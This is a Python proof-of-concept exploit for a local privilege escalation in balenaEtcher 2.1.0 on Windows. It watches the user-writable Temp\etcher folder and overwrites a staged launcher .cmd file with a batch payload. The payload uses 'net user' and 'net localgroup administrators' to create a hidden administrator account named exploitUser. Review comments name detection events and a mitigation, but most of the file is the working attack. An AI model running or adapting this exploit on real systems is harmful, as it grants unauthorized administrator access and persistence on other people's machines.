POC / exploit.py PY
import os
import time
import glob

# Configuration for a proof-of-concept that tampers with a batch script staged
# in the per-user Temp directory.
# NOTE(review): the page carries no advisory text. The weakness appears to be
# that a launcher script is written to a location the unprivileged user can
# modify and is later executed with higher privileges; that execution step is
# not shown here, so confirm against the vendor advisory.

# Account name read from the environment. os.environ.get returns None when
# USERNAME is unset, and None would then be formatted into the paths below.
username = os.environ.get("USERNAME")
# Directory that is polled. It sits under the user's own AppData\Local\Temp,
# which the user can write to by default.
target_folder = fr"C:\Users\{username}\AppData\Local\Temp\etcher"
# File-name prefix of the staged scripts; monitor_and_replace() appends "*.cmd".
file_prefix = "balena-etcher-electron-"
# Replacement batch content, in order:
#   - sets the code page and the ETCHER_* / UV_THREADPOOL_SIZE / SKIP variables
#     (presumably mirroring what the genuine launcher script sets; not shown),
#   - creates a local account and adds it to the local administrators group,
#   - starts etcher-util.exe from the app-2.1.0 install path.
# The two account commands only take effect if the script runs with
# administrative rights.
# Detection: Windows Security events 4720 (user account created) and 4732
# (member added to a security-enabled local group), and .cmd files in this
# directory being rewritten by a process other than the application itself.
# Mitigation: an elevated helper should not execute a script that lives in a
# user-writable directory; the fixed release is not stated on this page.
payload = fr'''
chcp 65001
set "ETCHER_SERVER_ADDRESS=127.0.0.1"
set "ETCHER_SERVER_ID=etcher-xxorfp"
set "ETCHER_SERVER_PORT=3435"
set "UV_THREADPOOL_SIZE=128"
set "SKIP=1"
net user exploitUser Password123! /add
net localgroup administrators exploitUser /add
"C:\Users\{username}\AppData\Local\balena_etcher\app-2.1.0\resources\etcher-util.exe"
'''

def monitor_and_replace() -> None:
    """Poll ``target_folder`` and overwrite the first matching .cmd file.

    Loops indefinitely, globbing ``target_folder`` for names starting with
    ``file_prefix`` and ending in ``.cmd``. Each match is opened in write
    mode, which truncates it, and its content is replaced with ``payload``.
    Returns after the first successful write; a failed write is printed and
    polling continues.

    NOTE(review): this works only because the staged script's content is not
    protected between the moment it is created and the moment it is run.
    Staging it where only administrators can write, or not passing the
    elevated command through a file at all, would close that window.
    """
    print(f"[*] Watching for balena-etcher-electron-*.cmd files in: {target_folder}")
    
    while True:
        # Re-list the directory on every pass; nothing is remembered between passes.
        cmd_files = glob.glob(os.path.join(target_folder, file_prefix + "*.cmd"))
        for cmd_file in cmd_files:
            print(f"[+] New .cmd file detected: {cmd_file}")
            try:
                # Mode "w" truncates the existing file before writing.
                with open(cmd_file, "w") as f:
                    f.write(payload)
                print("[+] Payload successfully written to .cmd file.")
                return  # Stop after the first successful overwrite
            except Exception as e:
                # Any failure (e.g. the file being locked or already removed) is
                # reported and the loop moves on to the next match or next pass.
                print(f"[-] Failed to write payload: {e}")
        # Half-second polling interval between directory scans.
        time.sleep(0.5)

# Entry point: start the directory watcher only when the file is run directly,
# not when it is imported.
if __name__ == "__main__":
    monitor_and_replace()